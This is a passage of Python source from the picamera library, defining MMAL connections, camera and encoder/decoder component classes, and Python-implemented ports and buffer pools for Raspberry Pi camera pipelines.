        mmal.MMAL_ENCODING_I420,
        mmal.MMAL_ENCODING_RGB24,
        mmal.MMAL_ENCODING_BGR24,
        mmal.MMAL_ENCODING_RGBA,
        mmal.MMAL_ENCODING_BGRA,
        )

    def __init__(
            self, source, target, formats=default_formats, callback=None):
        if not isinstance(source, MMALPort):
            raise PiCameraValueError('source is not an MMAL port')
        if not isinstance(target, MMALPort):
            raise PiCameraValueError('target is not an MMAL port')
        # Base class performs format negotiation and port registration
        super(MMALConnection, self).__init__(source, target, formats)
        self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
        self._callback = callback
        flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
        if callback is None:
            # With no Python-level callback the connection can be tunnelled
            # (buffers stay on the GPU side; no Python involvement per buffer)
            flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
        try:
            mmal_check(
                mmal.mmal_connection_create(
                    self._connection, source._port, target._port, flags),
                prefix="Failed to create connection")
        except:
            # Ensure close()/repr() see a consistent "never created" state
            self._connection = None
            raise

    def close(self):
        if self._connection is not None:
            mmal.mmal_connection_destroy(self._connection)
            self._connection = None
        # Drop the ctypes callback wrapper so it can be collected
        self._wrapper = None
        super(MMALConnection, self).close()

    @property
    def enabled(self):
        """
        Returns ``True`` if the connection is enabled. Use :meth:`enable`
        and :meth:`disable` to control the state of the connection.
        """
        return bool(self._connection[0].is_enabled)

    def enable(self):
        """
        Enable the connection. When a connection is enabled, data is
        continually transferred from the output port of the source to the input
        port of the target component.
        """
        def wrapper(connection):
            # First drain the connection's queue: buffers here have arrived
            # from the source and are run through the user callback before
            # being forwarded to the target
            buf = mmal.mmal_queue_get(connection[0].queue)
            if buf:
                buf = MMALBuffer(buf)
                try:
                    modified_buf = self._callback(self, buf)
                except:
                    buf.release()
                    raise
                else:
                    if modified_buf is not None:
                        try:
                            self._target.send_buffer(modified_buf)
                        except PiCameraPortDisabled:
                            # Target port disabled; ignore the error
                            pass
                    else:
                        # Callback returned None: drop the buffer
                        buf.release()
                    return
            # Then recycle empty buffers from the connection's pool back to
            # the source port so it can keep producing
            buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
            if buf:
                buf = MMALBuffer(buf)
                try:
                    self._source.send_buffer(buf)
                except PiCameraPortDisabled:
                    # Source port has been disabled; ignore the error
                    pass

        if self._callback is not None:
            # Keep a reference to the ctypes wrapper on self: if it were
            # garbage-collected, the C-side callback pointer would dangle
            self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
            self._connection[0].callback = self._wrapper
            self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
            self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
        mmal_check(
            mmal.mmal_connection_enable(self._connection),
            prefix="Failed to enable connection")
        if self._callback is not None:
            # Prime the source port with all of the connection pool's buffers
            MMALPool(self._connection[0].pool).send_all_buffers(self._source)

    def disable(self):
        """
        Disables the connection.
        """
        mmal_check(
            mmal.mmal_connection_disable(self._connection),
            prefix="Failed to disable connection")
        self._wrapper = None

    @property
    def name(self):
        return self._connection[0].name.decode('ascii')

    def __repr__(self):
        if self._connection is not None:
            return '<MMALConnection "%s">' % self.name
        else:
            return '<MMALConnection closed>'
class MMALRawCamera(MMALBaseComponent):
    """
    The MMAL "raw camera" component.

    Don't use this! If you insist on using this anyway, read the forum post
    about `raw sensor access`_ first.

    .. _raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
    """
    __slots__ = ()

    # The MMAL component name to instantiate
    component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
    # No input ports; a single OPAQUE-capable output
    opaque_input_subformats = ()
    opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
    """
    Represents the MMAL camera component. This component has 0 input ports and
    3 output ports. The intended use of the output ports (which in turn
    determines the behaviour of those ports) is as follows:

    * Port 0 is intended for preview renderers
    * Port 1 is intended for video recording
    * Port 2 is intended for still image capture

    Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
    obtain and manipulate the camera's configuration.
    """
    __slots__ = ()

    component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
    opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')

    # Annotation structure revisions, oldest first; position + 1 is the
    # revision number exposed via annotate_rev
    annotate_structs = (
        mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
        mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
        mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
        )

    def __init__(self):
        global FIX_RGB_BGR_ORDER
        super(MMALCamera, self).__init__()
        if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
            found = False
            # try largest struct to smallest as later firmwares still happily
            # accept earlier revision structures
            # XXX do old firmwares reject too-large structs?
            for struct in reversed(MMALCamera.annotate_structs):
                try:
                    PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
                    # Probe the firmware: the read raises PiCameraMMALError
                    # if this structure revision is unsupported
                    self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
                except PiCameraMMALError:
                    pass
                else:
                    found = True
                    break
            if not found:
                PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
        if FIX_RGB_BGR_ORDER is None:
            # old firmware lists BGR24 before RGB24 in supported_formats
            for f in self.outputs[1].supported_formats:
                if f == mmal.MMAL_ENCODING_BGR24:
                    FIX_RGB_BGR_ORDER = True
                    break
                elif f == mmal.MMAL_ENCODING_RGB24:
                    FIX_RGB_BGR_ORDER = False
                    break

    def _get_annotate_rev(self):
        try:
            return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
        # BUG FIX: tuple.index raises ValueError (not IndexError) when the
        # current structure is not a known revision; the previous handler
        # never fired and the raw ValueError escaped instead
        except ValueError:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "unknown camera annotation structure revision")

    def _set_annotate_rev(self, value):
        # NOTE(review): value=0 yields index -1 which silently selects the
        # latest revision rather than raising -- confirm whether callers
        # rely on this before tightening
        try:
            PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
        except IndexError:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "invalid camera annotation structure revision")

    annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
        The annotation capabilities of the firmware have evolved over time and
        several structures are available for querying and setting video
        annotations. By default the :class:`MMALCamera` class will pick the
        latest annotation structure supported by the current firmware but you
        can select older revisions with :attr:`annotate_rev` for other purposes
        (e.g. testing).
        """)
class MMALCameraInfo(MMALBaseComponent):
    """
    Represents the MMAL camera-info component. Query the
    ``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
    information about the connected camera module.
    """
    __slots__ = ()

    component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO

    # Info structure revisions, oldest first; position + 1 is the revision
    # number exposed via info_rev
    info_structs = (
        mmal.MMAL_PARAMETER_CAMERA_INFO_T,
        mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
        )

    def __init__(self):
        super(MMALCameraInfo, self).__init__()
        if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
            found = False
            # try smallest structure to largest as later firmwares reject
            # older structures
            for struct in MMALCameraInfo.info_structs:
                try:
                    PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
                    # Probe the firmware: the read raises PiCameraMMALError
                    # if this structure revision is unsupported
                    self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
                except PiCameraMMALError:
                    pass
                else:
                    found = True
                    break
            if not found:
                PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL, "unknown camera info structure revision")

    def _get_info_rev(self):
        try:
            return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
        # BUG FIX: tuple.index raises ValueError (not IndexError) when the
        # current structure is not a known revision; the previous handler
        # never fired and the raw ValueError escaped instead
        except ValueError:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "unknown camera info structure revision")

    def _set_info_rev(self, value):
        try:
            PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
        except IndexError:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "invalid camera info structure revision")

    info_rev = property(_get_info_rev, _set_info_rev, doc="""\
        The camera information capabilities of the firmware have evolved over
        time and several structures are available for querying camera
        information. When initialized, :class:`MMALCameraInfo` will attempt
        to discover which structure is in use by the extant firmware. This
        property can be used to discover the structure version and to modify
        the version in use for other purposes (e.g. testing).
        """)
class MMALComponent(MMALBaseComponent):
    """
    Represents an MMAL component that acts as a filter of some sort, with a
    single input that connects to an upstream source port. This is an
    abstract base class.
    """
    __slots__ = ()

    def __init__(self):
        super(MMALComponent, self).__init__()
        # Filters must declare exactly one opaque input sub-format
        assert len(self.opaque_input_subformats) == 1

    def close(self):
        self.disconnect()
        super(MMALComponent, self).close()

    def enable(self):
        super(MMALComponent, self).enable()
        if self.connection is not None:
            self.connection.enable()

    def disable(self):
        if self.connection is not None:
            self.connection.disable()
        super(MMALComponent, self).disable()

    def connect(self, source, **options):
        """
        Connects the input port of this component to the specified *source*
        :class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
        convenience (primarily intended for command line experimentation; don't
        use this in scripts), *source* can be another component in which case
        the first unconnected output port will be selected as *source*.

        Keyword arguments will be passed along to the connection constructor.
        See :class:`MMALConnection` and :class:`MMALPythonConnection` for
        further information.
        """
        if isinstance(source, (MMALPort, MMALPythonPort)):
            # BUG FIX: *options* were previously dropped when *source* was
            # given as a port rather than a component, so keyword arguments
            # such as a connection callback were silently ignored
            return self.inputs[0].connect(source, **options)
        else:
            for port in source.outputs:
                if not port.connection:
                    return self.inputs[0].connect(port, **options)
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'no free output ports on %r' % source)

    def disconnect(self):
        """
        Destroy the connection between this component's input port and the
        upstream component.
        """
        self.inputs[0].disconnect()

    @property
    def connection(self):
        """
        The :class:`MMALConnection` or :class:`MMALPythonConnection` object
        linking this component to the upstream component.
        """
        return self.inputs[0].connection
class MMALSplitter(MMALComponent):
    """
    The MMAL video splitter component. A single input port feeds 4 output
    ports, each of which emits a duplicate of every buffer received on the
    input.
    """
    __slots__ = ()

    component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
    opaque_input_subformats = ('OPQV-single',)
    opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
    """
    The MMAL ISP resizer component: 1 input port, 1 output port. Performs
    resizing on the VideoCore ISP and can also convert between numerous
    pixel formats (e.g. OPAQUE to RGB). More efficient than
    :class:`MMALResizer`, but only present on later firmware versions.
    """
    __slots__ = ()

    component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
    opaque_input_subformats = ('OPQV-single',)
    opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
    """
    Represents the MMAL VPU resizer component. This component has 1 input port
    and 1 output port. This supports resizing via the VPU. This is not as
    efficient as :class:`MMALISPResizer` but is available on all firmware
    versions. The output port can (and usually should) have a different frame
    size to the input port.
    """
    __slots__ = ()

    component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
    # The VPU resizer does not accept OPAQUE on either side
    opaque_input_subformats = (None,)
    opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
    """
    Abstract base class for the MMAL encoder components.
    """
    __slots__ = ()
class MMALVideoEncoder(MMALEncoder):
    """
    Represents the MMAL video encoder component. This component has 1 input
    port and 1 output port. The output port is usually configured with
    ``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
    # Input accepts the dual-plane OPAQUE sub-format; output (being encoded
    # data) never uses OPAQUE
    opaque_input_subformats = ('OPQV-dual',)
    opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
    """
    Represents the MMAL image encoder component. This component has 1 input
    port and 1 output port. The output port is typically configured with
    ``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
    ``MMAL_ENCODING_GIF``, etc.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
    # Input accepts the "strips" OPAQUE sub-format; output (being encoded
    # data) never uses OPAQUE
    opaque_input_subformats = ('OPQV-strips',)
    opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
    """
    Represents a generic MMAL decoder. This is an abstract base class; see
    :class:`MMALVideoDecoder` and :class:`MMALImageDecoder` for the concrete
    implementations.
    """
    __slots__ = ()
class MMALVideoDecoder(MMALDecoder):
    """
    Represents the MMAL video decoder component. This component has 1 input
    port and 1 output port. The input port is usually configured with
    ``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
    # Input (being encoded data) never uses OPAQUE; the decoded output uses
    # the single-plane OPAQUE sub-format
    opaque_input_subformats = (None,)
    opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
    """
    Represents the MMAL image decoder component. This component has 1 input
    port and 1 output port. The input port is usually configured with
    ``MMAL_ENCODING_JPEG``.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
    # Input (being encoded data) never uses OPAQUE; the decoded output uses
    # the single-plane OPAQUE sub-format
    opaque_input_subformats = (None,)
    opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
    """
    Implements ports for Python-based MMAL components.

    The port keeps its format in a real ctypes ``MMAL_ES_FORMAT_T`` so that
    formats can be copied to and from genuine MMAL ports (see
    :meth:`copy_from`), while buffer management, enable/disable state and
    connections are implemented purely in Python.
    """
    __slots__ = (
        '_buffer_count',
        '_buffer_size',
        '_connection',
        '_enabled',
        '_owner',
        '_pool',
        '_type',
        '_index',
        '_supported_formats',
        '_format',
        '_callback',
        )
    # Bytes-per-pixel for the uncompressed formats this port supports by
    # default; used by commit() to derive buffer_size (I420 is planar YUV,
    # hence 1.5 bytes per pixel)
    _FORMAT_BPP = {
        'I420': 1.5,
        'RGB3': 3,
        'RGBA': 4,
        'BGR3': 3,
        'BGRA': 4,
        }
    def __init__(self, owner, port_type, index):
        self._buffer_count = 2
        self._buffer_size = 0
        self._connection = None
        self._enabled = False
        # The owning component is held via a weak reference to avoid a
        # reference cycle between a component and its ports
        self._owner = weakref.ref(owner)
        self._pool = None
        self._callback = None
        self._type = port_type
        self._index = index
        self._supported_formats = {
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_BGR24,
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
            }
        # Default format: a video elementary stream encoded as I420
        self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
            type=mmal.MMAL_ES_TYPE_VIDEO,
            encoding=mmal.MMAL_ENCODING_I420,
            es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
    def close(self):
        # Tear down in reverse order of construction: connection, then
        # enabled state (and pool), then the format structure
        self.disconnect()
        self.disable()
        self._format = None
    def __repr__(self):
        return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
            self.name, mmal.FOURCC_str(self.format), self.buffer_count,
            self.buffer_size, self.framesize, self.framerate)
    def _get_bitrate(self):
        return self._format[0].bitrate
    def _set_bitrate(self, value):
        self._format[0].bitrate = value
    bitrate = property(_get_bitrate, _set_bitrate, doc="""\
        Retrieves or sets the bitrate limit for the port's format.
        """)
    def _get_supported_formats(self):
        return self._supported_formats
    def _set_supported_formats(self, value):
        # Accept either a single format or any iterable of formats
        try:
            value = {f for f in value}
        except TypeError:
            value = {value}
        if not value:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "port must have at least one valid format")
        self._supported_formats = value
    supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
        Retrieves or sets the set of valid formats for this port. The set must
        always contain at least one valid format. A single format can be
        specified; it will be converted implicitly to a singleton set.

        If the current port :attr:`format` is not a member of the new set, no
        error is raised. An error will be raised when :meth:`commit` is next
        called if :attr:`format` is still not a member of the set.
        """)
    def _get_format(self):
        return self._format[0].encoding
    def _set_format(self, value):
        self._format[0].encoding = value
    format = property(_get_format, _set_format, doc="""\
        Retrieves or sets the encoding format of the port.
        """)
    def _get_framesize(self):
        # The "real" frame size is the crop rectangle; width/height are the
        # block-aligned allocation dimensions
        return PiResolution(
            self._format[0].es[0].video.crop.width,
            self._format[0].es[0].video.crop.height,
            )
    def _set_framesize(self, value):
        value = to_resolution(value)
        video = self._format[0].es[0].video
        # Align the allocated dimensions up to the camera's 32x16 block size
        # while recording the requested size in the crop rectangle
        video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
        video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
        video.crop.width = value.width
        video.crop.height = value.height
    framesize = property(_get_framesize, _set_framesize, doc="""\
        Retrieves or sets the size of the source's video frames as a (width,
        height) tuple. This attribute implicitly handles scaling the given
        size up to the block size of the camera (32x16).
        """)
    def _get_framerate(self):
        video = self._format[0].es[0].video
        try:
            return Fraction(
                video.frame_rate.num,
                video.frame_rate.den)
        except ZeroDivisionError:
            # A zero denominator denotes "unknown" framerate
            return Fraction(0, 1)
    def _set_framerate(self, value):
        value = to_fraction(value)
        video = self._format[0].es[0].video
        video.frame_rate.num = value.numerator
        video.frame_rate.den = value.denominator
    framerate = property(_get_framerate, _set_framerate, doc="""\
        Retrieves or sets the framerate of the port's video frames in fps.
        """)
    @property
    def pool(self):
        """
        Returns the :class:`MMALPool` associated with the buffer, if any.
        """
        return self._pool
    @property
    def opaque_subformat(self):
        # Python ports never deal in OPAQUE data
        return None
    def _get_buffer_count(self):
        return self._buffer_count
    def _set_buffer_count(self, value):
        if value < 1:
            raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
        self._buffer_count = int(value)
    buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
        The number of buffers allocated (or to be allocated) to the port. The
        default is 2 but more may be required in the case of long pipelines
        with replicated buffers.
        """)
    def _get_buffer_size(self):
        return self._buffer_size
    def _set_buffer_size(self, value):
        if value < 0:
            raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
        self._buffer_size = value
    buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
        The size of buffers allocated (or to be allocated) to the port. The
        size of buffers defaults to a value dictated by the port's format.
        """)
    def copy_from(self, source):
        """
        Copies the port's :attr:`format` from the *source*
        :class:`MMALControlPort`.
        """
        # Both branches use the C-level mmal_format_copy; the source format
        # structure just lives in a different place for real MMAL ports
        if isinstance(source, MMALPythonPort):
            mmal.mmal_format_copy(self._format, source._format)
        else:
            mmal.mmal_format_copy(self._format, source._port[0].format)
    def commit(self):
        """
        Commits the port's configuration and automatically updates the number
        and size of associated buffers. This is typically called after
        adjusting the port's format and/or associated settings (like width and
        height for video ports).
        """
        if self.format not in self.supported_formats:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
        # Reset to the default double-buffer count; the owning component's
        # _commit_port hook (called below) may adjust this
        self._buffer_count = 2
        video = self._format[0].es[0].video
        try:
            self._buffer_size = int(
                MMALPythonPort._FORMAT_BPP[str(self.format)]
                * video.width
                * video.height)
        except KeyError:
            # If it's an unknown / encoded format just leave the buffer size
            # alone and hope the owning component knows what to set
            pass
        self._owner()._commit_port(self)
    @property
    def enabled(self):
        """
        Returns a :class:`bool` indicating whether the port is currently
        enabled. Unlike other classes, this is a read-only property. Use
        :meth:`enable` and :meth:`disable` to modify the value.
        """
        return self._enabled
    def enable(self, callback=None):
        """
        Enable the port with the specified callback function (this must be
        ``None`` for connected ports, and a callable for disconnected ports).

        The callback function must accept two parameters which will be this
        :class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
        instance. Any return value will be ignored.
        """
        if self._connection is not None:
            if callback is not None:
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL,
                    'connected ports must be enabled without callback')
        else:
            if callback is None:
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL,
                    'unconnected ports must be enabled with callback')
        # Input ports and unconnected ports own a pool; connected output
        # ports borrow buffers from the downstream input port instead (see
        # get_buffer)
        if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
            self._pool = MMALPythonPortPool(self)
        self._callback = callback
        self._enabled = True
    def disable(self):
        """
        Disable the port.
        """
        self._enabled = False
        if self._pool is not None:
            # Release any unprocessed buffers from the owner's queue before
            # we destroy them all
            while True:
                buf = self._owner()._queue.get(False)
                if buf:
                    buf.release()
                else:
                    break
            self._pool.close()
            self._pool = None
        self._callback = None
    def get_buffer(self, block=True, timeout=None):
        """
        Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
        and *timeout* act as they do in the corresponding
        :meth:`MMALPool.get_buffer`.
        """
        if not self._enabled:
            raise PiCameraPortDisabled(
                'cannot get buffer from disabled port %s' % self.name)
        if self._pool is not None:
            # Unconnected port or input port case; retrieve buffer from the
            # allocated pool
            return self._pool.get_buffer(block, timeout)
        else:
            # Connected output port case; get a buffer from the target input
            # port (in this case the port is just a thin proxy for the
            # corresponding input port)
            assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
            return self._connection.target.get_buffer(block, timeout)
    def send_buffer(self, buf):
        """
        Send :class:`MMALBuffer` *buf* to the port.
        """
        # NOTE: The MMALPythonConnection callback must occur *before* the test
        # for the port being enabled; it's meant to be the connection making
        # the callback prior to the buffer getting to the port after all
        if (
                self.type == mmal.MMAL_PORT_TYPE_INPUT and
                self._connection._callback is not None):
            try:
                modified_buf = self._connection._callback(self._connection, buf)
            except:
                buf.release()
                raise
            else:
                # A None result from the connection callback means "drop the
                # buffer"; anything else replaces it
                if modified_buf is None:
                    buf.release()
                    return
                else:
                    buf = modified_buf
        if not self._enabled:
            raise PiCameraPortDisabled(
                'cannot send buffer to disabled port %s' % self.name)
        if self._callback is not None:
            try:
                # XXX Return value? If it's an input port we should ignore it,
                # but what about output ports?
                self._callback(self, buf)
            except:
                buf.release()
                raise
        if self._type == mmal.MMAL_PORT_TYPE_INPUT:
            # Input port case; queue the buffer for processing on the
            # owning component
            self._owner()._queue.put(buf)
        elif self._connection is None:
            # Unconnected output port case; release the buffer back to the
            # pool
            buf.release()
        else:
            # Connected output port case; forward the buffer to the
            # connected component's input port
            # XXX If it's a format-change event?
            self._connection.target.send_buffer(buf)
    @property
    def name(self):
        return '%s:%s:%d' % (self._owner().name, {
            mmal.MMAL_PORT_TYPE_OUTPUT:  'out',
            mmal.MMAL_PORT_TYPE_INPUT:   'in',
            mmal.MMAL_PORT_TYPE_CONTROL: 'control',
            mmal.MMAL_PORT_TYPE_CLOCK:   'clock',
            }[self.type], self._index)
    @property
    def type(self):
        """
        The type of the port. One of:

        * MMAL_PORT_TYPE_OUTPUT
        * MMAL_PORT_TYPE_INPUT
        * MMAL_PORT_TYPE_CONTROL
        * MMAL_PORT_TYPE_CLOCK
        """
        return self._type
    @property
    def capabilities(self):
        """
        The capabilities of the port. A bitfield of the following:

        * MMAL_PORT_CAPABILITY_PASSTHROUGH
        * MMAL_PORT_CAPABILITY_ALLOCATION
        * MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
        """
        return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
    @property
    def index(self):
        """
        Returns an integer indicating the port's position within its owning
        list (inputs, outputs, etc.)
        """
        return self._index
    @property
    def connection(self):
        """
        If this port is connected to another, this property holds the
        :class:`MMALConnection` or :class:`MMALPythonConnection` object which
        represents that connection. If this port is not connected, this
        property is ``None``.
        """
        return self._connection
    def connect(self, other, **options):
        """
        Connect this port to the *other* :class:`MMALPort` (or
        :class:`MMALPythonPort`). The type and configuration of the connection
        will be automatically selected.

        Various connection options can be specified as keyword arguments. These
        will be passed onto the :class:`MMALConnection` or
        :class:`MMALPythonConnection` constructor that is called (see those
        classes for an explanation of the available options).
        """
        # Always construct connections from the output end
        if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
            return other.connect(self, **options)
        if other.type != mmal.MMAL_PORT_TYPE_INPUT:
            raise PiCameraValueError(
                'A connection can only be established between an output and '
                'an input port')
        return MMALPythonConnection(self, other, **options)
    def disconnect(self):
        """
        Destroy the connection between this port and another port.
        """
        if self.connection is not None:
            self.connection.close()
class MMALPythonPortPool(MMALPool):
    """
    A pool of buffer headers serving a single :class:`MMALPythonPort`. Only
    used when a fake (Python) port operates without a corresponding
    :class:`MMALPythonConnection`.
    """
    __slots__ = ('_port',)

    def __init__(self, port):
        # Size the underlying C pool from the port's current configuration
        pool = mmal.mmal_pool_create(port.buffer_count, port.buffer_size)
        super(MMALPythonPortPool, self).__init__(pool)
        self._port = port

    @property
    def port(self):
        # The MMALPythonPort this pool was created for
        return self._port

    def send_buffer(self, port=None, block=True, timeout=None):
        """
        Get a buffer from the pool and send it to *port*, defaulting to the
        port the pool is associated with. *block* and *timeout* act as they
        do in :meth:`MMALPool.get_buffer`.
        """
        target = self._port if port is None else port
        super(MMALPythonPortPool, self).send_buffer(target, block, timeout)

    def send_all_buffers(self, port=None, block=True, timeout=None):
        """
        Send all buffers from the pool to *port*, defaulting to the port the
        pool is associated with. *block* and *timeout* act as they do in
        :meth:`MMALPool.get_buffer`.
        """
        target = self._port if port is None else port
        super(MMALPythonPortPool, self).send_all_buffers(target, block, timeout)
class MMALPythonBaseComponent(MMALObject):
    """
    Base class for Python-implemented MMAL components. It supplies the
    :attr:`enabled` state (toggled via :meth:`enable` / :meth:`disable`) and
    the :meth:`_commit_port` hook that descendents override to control their
    ports' behaviour. Users will rarely want to sub-class this directly; see
    :class:`MMALPythonComponent` for a more useful starting point.
    """
    __slots__ = ('_inputs', '_outputs', '_enabled',)

    def __init__(self):
        super(MMALPythonBaseComponent, self).__init__()
        self._enabled = False
        self._inputs = ()
        self._outputs = ()
        # TODO Control port?

    def close(self):
        """
        Close the component and release all its resources. After this is
        called, most methods will raise exceptions if called.
        """
        self.disable()

    @property
    def enabled(self):
        """
        ``True`` if the component is currently enabled. Use :meth:`enable`
        and :meth:`disable` to change the component's state.
        """
        return self._enabled

    def enable(self):
        """
        Enable the component. When a component is enabled it will process data
        sent to its input port(s), sending the results to buffers on its output
        port(s). Components may be implicitly enabled by connections.
        """
        self._enabled = True

    def disable(self):
        """
        Disables the component.
        """
        self._enabled = False

    @property
    def control(self):
        """
        The :class:`MMALControlPort` control port of the component. Python
        components have no control port, so this is always ``None``.
        """
        return None

    @property
    def inputs(self):
        """
        A sequence of :class:`MMALPort` objects representing the inputs
        of the component.
        """
        return self._inputs

    @property
    def outputs(self):
        """
        A sequence of :class:`MMALPort` objects representing the outputs
        of the component.
        """
        return self._outputs

    def _commit_port(self, port):
        """
        Called by ports when their format is committed. Descendents may
        override this to reconfigure output ports when input ports are
        committed, or to raise errors if the new port configuration is
        unacceptable.

        .. warning::

            This method must *not* reconfigure input ports when called; however
            it can reconfigure *output* ports when input ports are committed.
        """
        pass

    def __repr__(self):
        # Guard clause: no outputs is treated as "closed"
        if not self._outputs:
            return '<%s closed>' % self.__class__.__name__
        return '<%s "%s": %d inputs %d outputs>' % (
            self.__class__.__name__, self.name,
            len(self.inputs), len(self.outputs))
class MMALPythonSource(MMALPythonBaseComponent):
    """
    Provides a source for other :class:`MMALComponent` instances. The
    specified *input* is read in chunks the size of the configured output
    buffer(s) until the input is exhausted. The :meth:`wait` method can be
    used to block until this occurs. If the output buffer is configured to
    use a full-frame unencoded format (like I420 or RGB), frame-end flags will
    be automatically generated by the source. When the input is exhausted an
    empty buffer with the End Of Stream (EOS) flag will be sent.

    The component provides all picamera's usual IO-handling characteristics; if
    *input* is a string, a file with that name will be opened as the input and
    closed implicitly when the component is closed. Otherwise, the input will
    not be closed implicitly (the component did not open it, so the assumption
    is that closing *input* is the caller's responsibility). If *input* is an
    object with a ``read`` method it is assumed to be a file-like object and is
    used as is. Otherwise, *input* is assumed to be a readable object
    supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
    stream).
    """
    __slots__ = ('_stream', '_opened', '_thread')
    def __init__(self, input):
        super(MMALPythonSource, self).__init__()
        # A source has no inputs and exactly one output
        self._inputs = ()
        self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
        self._stream, self._opened = open_stream(input, output=False)
        self._thread = None
    def close(self):
        super(MMALPythonSource, self).close()
        if self._outputs:
